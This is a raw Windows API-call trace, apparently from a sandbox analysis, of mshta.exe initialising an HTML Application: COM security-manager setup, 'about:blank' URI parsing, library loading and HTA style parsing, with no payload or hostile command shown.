[0036.419] GetCurrentThread () returned 0xfffffffffffffffe
[0036.419] GetCurrentProcess () returned 0xffffffffffffffff
[0036.419] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xb8a8ffce20, dwDesiredAccess=0x4a, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0xb8a8ffce20*=0x1a4) returned 1
[0036.419] GetCurrentThreadId () returned 0x210
[0036.419] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1a0
[0036.419] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1a8
[0036.419] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1ac
[0036.419] _beginthreadex (in: _Security=0x0, _StackSize=0x493e0, _StartAddress=0x7ffb22492ea0, _ArgList=0xc0aa9d0270, _InitFlag=0xb800010000, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x1b0
[0036.419] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0xb8a8a2e3f0*=0x1a0, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0036.421] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32
[0036.421] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8
[0036.421] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32
[0036.421] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb8a8a2e2e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0036.421] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0036.421] IsInternetESCEnabled () returned 0x0
[0036.421] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", lpValue="NoFileMenu", dwFlags=0xffff, pdwType=0xb8a8a2e2dc, pvData=0xb8a8a2e2d4, pcbData=0xb8a8a2e2d8*=0x4 | out: pdwType=0xb8a8a2e2dc*=0xb8, pvData=0xb8a8a2e2d4, pcbData=0xb8a8a2e2d8*=0x4) returned 0x2
[0036.422] QueryPerformanceFrequency (in: lpFrequency=0xb8a8a2e470 | out: lpFrequency=0xb8a8a2e470) returned 1
[0036.423] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0036.423] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0036.423] GetCurrentThreadId () returned 0x210
[0036.424] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc124
[0036.425] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.425] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName="CoInternetCreateSecurityManager") returned 0x7ffb2ea61c00
[0036.425] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e300 | out: lpflOldProtect=0xb8a8a2e300*=0x4) returned 1
[0036.425] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x7ffb238e91b0, dwReserved=0x0 | out: ppSM=0x7ffb238e91b0*=0xb8a8c37cf0) returned 0x0
[0036.428] GetDoubleClickTime () returned 0x1f4
[0036.428] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb
[0036.431] memcpy_s (in: _Destination=0xc0aab1c0c0, _DestinationSize=0xc0, _Source=0xb8a8a2dab0, _SourceSize=0xc0 | out: _Destination=0xc0aab1c0c0) returned 0x0
[0036.431] memcpy_s (in: _Destination=0xc0aaaf4160, _DestinationSize=0x158, _Source=0xb8a8a2db70, _SourceSize=0x158 | out: _Destination=0xc0aaaf4160) returned 0x0
[0036.435] GetCurrentThreadId () returned 0x210
[0036.435] CreateUri (in: pwzURI="about:blank", dwFlags=0x1002b80, dwReserved=0x0, ppURI=0xb8a8a2deb0 | out: ppURI=0xb8a8a2deb0*=0xb8a8c2fe40) returned 0x0
[0036.436] IUri:GetPropertyDWORD (in: This=0xb8a8c2fe40, uriProp=0x11, pdwProperty=0xb8a8a2de80, dwFlags=0x0 | out: pdwProperty=0xb8a8a2de80*=0x11) returned 0x0
[0036.436] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0xb8a8a2de08, dwReserved=0x0 | out: ppSM=0xb8a8a2de08*=0xb8a8c38780) returned 0x0
[0036.436] IUnknown:QueryInterface (in: This=0xb8a8c38780, riid=0x7ffb233e61d8*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0xb8a8a2de00 | out: ppvObject=0xb8a8a2de00*=0xb8a8c38780) returned 0x0
[0036.436] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0036.436] IInternetSecurityManager:SetSecuritySite (This=0xb8a8c38780, pSite=0xc0aab09280) returned 0x0
[0036.438] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0036.438] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.438] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName=0x208) returned 0x7ffb2ea6b520
[0036.438] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2dc90 | out: lpflOldProtect=0xb8a8a2dc90*=0x4) returned 1
[0036.520] DllGetClassObject (in: rclsid=0xb8a8c33580*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0xb8a8a2c340*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xb8a8a2b530 | out: ppv=0xb8a8a2b530*=0x7ffb238c81f0) returned 0x0
[0036.521] IUnknown:AddRef (This=0x7ffb238c81f0) returned 0x1
[0036.521] IUnknown:Release (This=0x7ffb238c81f0) returned 0x1
[0036.521] IUnknown:QueryInterface (in: This=0x7ffb238c81f0, riid=0x7ffb2eb4ae90*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xb8a8a2c658 | out: ppvObject=0xb8a8a2c658*=0x7ffb238c81f0) returned 0x0
[0036.521] IUnknown:Release (This=0x7ffb238c81f0) returned 0x1
[0036.521] IUnknown:QueryInterface (in: This=0x7ffb238c81f0, riid=0x7ffb2eb4a108*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8a2ca58 | out: ppvObject=0xb8a8a2ca58*=0x7ffb238c8208) returned 0x0
[0036.521] IUnknown:Release (This=0x7ffb238c81f0) returned 0x1
[0036.521] IInternetProtocolInfo:ParseUrl (in: This=0x7ffb238c8208, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0xb8a8c30e40, cchResult=0xc, pcchResult=0xb8a8a2ca20, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0xb8a8a2ca20*=0xc) returned 0x0
[0036.521] StrCmpICW (pszStr1="about:blank", pszStr2="about:blank") returned 0
[0036.522] IUnknown:Release (This=0x7ffb238c8208) returned 0x1
[0036.522] DllGetClassObject (in: rclsid=0xb8a8c33580*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7ffb2eb4ae90*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xb8a8a2c9b0 | out: ppv=0xb8a8a2c9b0*=0x7ffb238c81f0) returned 0x0
[0036.522] IUnknown:QueryInterface (in: This=0x7ffb238c81f0, riid=0x7ffb2eb4a108*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8a2ca60 | out: ppvObject=0xb8a8a2ca60*=0x7ffb238c8208) returned 0x0
[0036.522] IUnknown:Release (This=0x7ffb238c81f0) returned 0x1
[0036.522] IInternetProtocolInfo:ParseUrl (in: This=0x7ffb238c8208, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0xb8a8c30d60, cchResult=0xc, pcchResult=0xb8a8a2ca50, dwReserved=0x0 | out: pwzResult="", pcchResult=0xb8a8a2ca50*=0x0) returned 0x800c0011
[0036.522] IUnknown:Release (This=0x7ffb238c8208) returned 0x1
[0036.524] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0036.524] IUnknown:Release (This=0xb8a8c2fe40) returned 0x3
[0036.524] memcpy_s (in: _Destination=0xb8a8c30f20, _DestinationSize=0x10, _Source=0xb8a8a2df50, _SourceSize=0x10 | out: _Destination=0xb8a8c30f20) returned 0x0
[0036.525] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0xb8a8a2df00, dwReserved=0x0 | out: ppSM=0xb8a8a2df00*=0xb8a8c38920) returned 0x0
[0036.525] memcpy_s (in: _Destination=0xb8a8c30fe0, _DestinationSize=0x10, _Source=0xb8a8a2df50, _SourceSize=0x10 | out: _Destination=0xb8a8c30fe0) returned 0x0
[0036.525] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0036.525] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.525] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName=0x1bc) returned 0x7ffb2ea98500
[0036.525] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2dfc0 | out: lpflOldProtect=0xb8a8a2dfc0*=0x4) returned 1
[0036.526] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0036.528] memcpy_s (in: _Destination=0xb8a8c3c950, _DestinationSize=0x2000, _Source=0xb8a8a2e0a0, _SourceSize=0x4 | out: _Destination=0xb8a8c3c950) returned 0x0
[0036.528] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0036.528] CreateUri (in: pwzURI="about:blank", dwFlags=0x1002b80, dwReserved=0x0, ppURI=0xb8a8a2dc78 | out: ppURI=0xb8a8a2dc78*=0xb8a8c2fe40) returned 0x0
[0036.529] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0036.529] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.529] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName=0x209) returned 0x7ffb2ea6b870
[0036.529] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2dab0 | out: lpflOldProtect=0xb8a8a2dab0*=0x4) returned 1
[0036.530] DllGetClassObject (in: rclsid=0xb8a8c33580*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7ffb2eb4ae90*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xb8a8a2c720 | out: ppv=0xb8a8a2c720*=0x7ffb238c81f0) returned 0x0
[0036.530] IUnknown:QueryInterface (in: This=0x7ffb238c81f0, riid=0x7ffb2eb4a108*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8a2c7c8 | out: ppvObject=0xb8a8a2c7c8*=0x7ffb238c8208) returned 0x0
[0036.530] IUnknown:Release (This=0x7ffb238c81f0) returned 0x1
[0036.530] IInternetProtocolInfo:ParseUrl (in: This=0x7ffb238c8208, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0xb8a8c309e0, cchResult=0xc, pcchResult=0xb8a8a2c790, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0xb8a8a2c790*=0xc) returned 0x0
[0036.530] StrCmpICW (pszStr1="about:blank", pszStr2="about:blank") returned 0
[0036.530] IUnknown:Release (This=0x7ffb238c8208) returned 0x1
[0036.530] DllGetClassObject (in: rclsid=0xb8a8c33580*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7ffb2eb4ae90*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xb8a8a2c720 | out: ppv=0xb8a8a2c720*=0x7ffb238c81f0) returned 0x0
[0036.530] IUnknown:QueryInterface (in: This=0x7ffb238c81f0, riid=0x7ffb2eb4a108*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8a2c7d0 | out: ppvObject=0xb8a8a2c7d0*=0x7ffb238c8208) returned 0x0
[0036.530] IUnknown:Release (This=0x7ffb238c81f0) returned 0x1
[0036.530] IInternetProtocolInfo:ParseUrl (in: This=0x7ffb238c8208, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0xb8a8c310c0, cchResult=0xc, pcchResult=0xb8a8a2c7c0, dwReserved=0x0 | out: pwzResult="", pcchResult=0xb8a8a2c7c0*=0x0) returned 0x800c0011
[0036.530] IUnknown:Release (This=0x7ffb238c8208) returned 0x1
[0036.531] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0036.531] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0036.531] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0xb8a8c38780, pUri=0xb8a8c2fe40, dwAction=0x2106, pPolicy=0xb8a8a2dc70, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0xb8a8a2dcb0 | out: pPolicy=0xb8a8a2dc70*=0x0, pdwOutFlags=0xb8a8a2dcb0*=0x0) returned 0x0
[0036.531] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0036.531] IUnknown:Release (This=0xb8a8c2fe40) returned 0x4
[0036.531] GetDoubleClickTime () returned 0x1f4
[0036.531] GetSystemMetrics (nIndex=36) returned 4
[0036.531] GetSystemMetrics (nIndex=37) returned 4
[0036.532] RtlInitializeConditionVariable (in: ConditionVariable=0xc0aab200d8 | out: ConditionVariable=0xc0aab200d8)
[0036.532] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.532] GetProcAddress (hModule=0x7ffb3cc70000, lpProcName="CoTaskMemAlloc") returned 0x7ffb3cd20ff0
[0036.532] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e2a0 | out: lpflOldProtect=0xb8a8a2e2a0*=0x4) returned 1
[0036.532] CoTaskMemAlloc (cb=0x30) returned 0xb8a8c39c00
[0036.532] QISearch (in: that=0xc0aab20190, pqit=0x7ffb233fb538, riid=0x7ffb233fb558*(Data1=0xaf11d3db, Data2=0x81a6, Data3=0x4b88, Data4=([0]=0xae, [1]=0x7, [2]=0x96, [3]=0xec, [4]=0xcf, [5]=0x46, [6]=0xd0, [7]=0x76)), ppv=0xc0aab096e0 | out: that=0xc0aab20190, ppv=0xc0aab096e0*=0xc0aab20190) returned 0x0
[0036.532] CoTaskMemAlloc (cb=0x30) returned 0xb8a8c39e00
[0036.532] QISearch (in: that=0xc0aab201e0, pqit=0x7ffb233fb538, riid=0x7ffb233fb558*(Data1=0xaf11d3db, Data2=0x81a6, Data3=0x4b88, Data4=([0]=0xae, [1]=0x7, [2]=0x96, [3]=0xec, [4]=0xcf, [5]=0x46, [6]=0xd0, [7]=0x76)), ppv=0xc0aab096e8 | out: that=0xc0aab201e0, ppv=0xc0aab096e8*=0xc0aab201e0) returned 0x0
[0036.532] IUnknown:AddRef (This=0xc0aab201e0) returned 0x2
[0036.533] GetTickCount () returned 0x1ba23
[0036.533] GetSystemTimeAdjustment (in: lpTimeAdjustment=0xb8a8a2e3d0, lpTimeIncrement=0xb8a8a2e3c0, lpTimeAdjustmentDisabled=0xb8a8a2e3c8 | out: lpTimeAdjustment=0xb8a8a2e3d0, lpTimeIncrement=0xb8a8a2e3c0, lpTimeAdjustmentDisabled=0xb8a8a2e3c8) returned 1
[0036.534] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2e310 | out: lpPerformanceCount=0xb8a8a2e310*=398716298) returned 1
[0036.534] QueryPerformanceFrequency (in: lpFrequency=0x7ffb238e9270 | out: lpFrequency=0x7ffb238e9270) returned 1
[0036.537] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.538] LoadLibraryExA (lpLibFileName="OLEAUT32.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb3c9b0000
[0036.538] GetProcAddress (hModule=0x7ffb3c9b0000, lpProcName=0x9) returned 0x7ffb3ca39910
[0036.538] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f830 | out: lpflOldProtect=0xb8a8a2f830*=0x4) returned 1
[0036.538] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.538] LoadLibraryExA (lpLibFileName="api-ms-win-downlevel-shlwapi-l2-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb3a570000
[0036.538] GetProcAddress (hModule=0x7ffb3a570000, lpProcName="IUnknown_QueryService") returned 0x7ffb3a5a4b50
[0036.538] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f880 | out: lpflOldProtect=0xb8a8a2f880*=0x4) returned 1
[0036.538] IUnknown_QueryService (in: punk=0x7ffb238e5d58, guidService=0x7ffb233f9db0*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7ffb233f9dc0*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0xc0aab080a8 | out: ppvOut=0xc0aab080a8*=0x0) returned 0x80004005
[0036.538] IUnknown:QueryInterface (in: This=0x7ffb238e5d58, riid=0x7ffb3a5f4628*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xb8a8a2f9f0 | out: ppvObject=0xb8a8a2f9f0*=0x7ffb238e5d80) returned 0x0
[0036.538] IUnknown:Release (This=0x7ffb238e5d80) returned 0x1
[0036.539] IUnknown_QueryService (in: punk=0x7ffb238e5d58, guidService=0x7ffb23467b98*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), riid=0x7ffb23467b98*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), ppvOut=0xb8a8a2fa30 | out: ppvOut=0xb8a8a2fa30*=0x0) returned 0x80004005
[0036.539] IUnknown:QueryInterface (in: This=0x7ffb238e5d58, riid=0x7ffb3a5f4628*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xb8a8a2f9b0 | out: ppvObject=0xb8a8a2f9b0*=0x7ffb238e5d80) returned 0x0
[0036.539] IServiceProvider:QueryService (in: This=0x7ffb238e5d80, guidService=0x7ffb23467b98*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), riid=0x7ffb23467b98*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), ppvObject=0xb8a8a2fa30 | out: ppvObject=0xb8a8a2fa30*=0x0) returned 0x80004005
[0036.539] IUnknown:Release (This=0x7ffb238e5d80) returned 0x1
[0036.539] IInternetSecurityManager:SetSecuritySite (This=0xb8a8c38780, pSite=0xc0aab09280) returned 0x0
[0036.539] IUnknown:Release (This=0xc0aab09280) returned 0x0
[0036.539] IUnknown:AddRef (This=0xc0aab09280) returned 0x30
[0036.539] IUnknown:QueryInterface (in: This=0xc0aab09280, riid=0x7ffb2eb49210*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xb8a8a2fa30 | out: ppvObject=0xb8a8a2fa30*=0xc0aab09288) returned 0x0
[0036.539] IServiceProvider:QueryService (in: This=0xc0aab09288, guidService=0x7ffb2eb48b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), riid=0x7ffb2eb48b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), ppvObject=0xb8a8c387e0 | out: ppvObject=0xb8a8c387e0*=0x0) returned 0x80004002
[0036.539] IServiceProvider:QueryService (in: This=0xc0aab09288, guidService=0x7ffb2eb48b98*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7ffb2eb48b98*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0xb8a8c387d8 | out: ppvObject=0xb8a8c387d8*=0x0) returned 0x80004002
[0036.539] IServiceProvider:QueryService (in: This=0xc0aab09288, guidService=0x7ffb2eb48ba8*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7ffb2eb48ba8*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0xb8a8c387d0 | out: ppvObject=0xb8a8c387d0*=0x0) returned 0x80004002
[0036.539] IServiceProvider:QueryService (in: This=0xc0aab09288, guidService=0x7ffb2eb48b88*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7ffb2eb48b88*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8c387c8 | out: ppvObject=0xb8a8c387c8*=0x7ffb238e5d88) returned 0x0
[0036.539] IUnknown:Release (This=0xc0aab09288) returned 0x0
[0036.540] CoTaskMemAlloc (cb=0x6d) returned 0xb8a8c3a310
[0036.540] CoTaskMemAlloc (cb=0x9) returned 0xb8a8c310c0
[0036.541] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0
[0036.541] memcpy_s (in: _Destination=0xc0aaadc294, _DestinationSize=0x8, _Source=0xb8a8c30e44, _SourceSize=0x6 | out: _Destination=0xc0aaadc294) returned 0x0
[0036.541] wcscmp (_String1="HTA\\:APPLICATION {behavior:url(#default#APPLICATION)}", _String2="link, meta, .hslice {behavior:url(#default#discovery);}") returned -1
[0036.542] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.542] GetProcAddress (hModule=0x7ffb3a9f0000, lpProcName=0x1d) returned 0x7ffb3aa04720
[0036.542] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f660 | out: lpflOldProtect=0xb8a8a2f660*=0x4) returned 1
[0036.543] IsCharSpaceW (wch=0x48) returned 0
[0036.543] IsCharAlphaNumericW (ch=0x5c) returned 0
[0036.543] IsCharSpaceW (wch=0x5c) returned 0
[0036.543] IsCharSpaceW (wch=0x41) returned 0
[0036.543] IsCharAlphaNumericW (ch=0x20) returned 0
[0036.543] IsCharSpaceW (wch=0x20) returned 1
[0036.543] IsCharSpaceW (wch=0x7b) returned 0
[0036.543] IsCharSpaceW (wch=0x20) returned 1
[0036.543] IsCharAlphaNumericW (ch=0x7b) returned 0
[0036.543] IsCharSpaceW (wch=0x62) returned 0
[0036.543] IsCharAlphaNumericW (ch=0x3a) returned 0
[0036.543] IsCharSpaceW (wch=0x3a) returned 0
[0036.546] IsCharAlphaNumericW (ch=0x3a) returned 0
[0036.546] IsCharSpaceW (wch=0x75) returned 0
[0036.546] IsCharAlphaNumericW (ch=0x28) returned 0
[0036.546] IsCharSpaceW (wch=0x28) returned 0
[0036.546] IsCharAlphaNumericW (ch=0x28) returned 0
[0036.546] IsCharSpaceW (wch=0x23) returned 0
[0036.546] IsCharSpaceW (wch=0x23) returned 0
[0036.546] IsCharSpaceW (wch=0x7d) returned 0
[0036.546] IsCharAlphaNumericW (ch=0x7d) returned 0
[0036.546] IsCharSpaceW (wch=0x29) returned 0
[0036.546] IsCharSpaceW (wch=0x75) returned 0
[0036.546] IsCharSpaceW (wch=0x75) returned 0
[0036.546] IsCharSpaceW (wch=0x29) returned 0
[0036.548] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.549] GetProcAddress (hModule=0x7ffb3cc70000, lpProcName="CoTaskMemFree") returned 0x7ffb3cd21110
[0036.549] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f750 | out: lpflOldProtect=0xb8a8a2f750*=0x4) returned 1
[0036.549] CoTaskMemFree (pv=0xb8a8c3a310)
[0036.549] CoTaskMemFree (pv=0xb8a8c310c0)
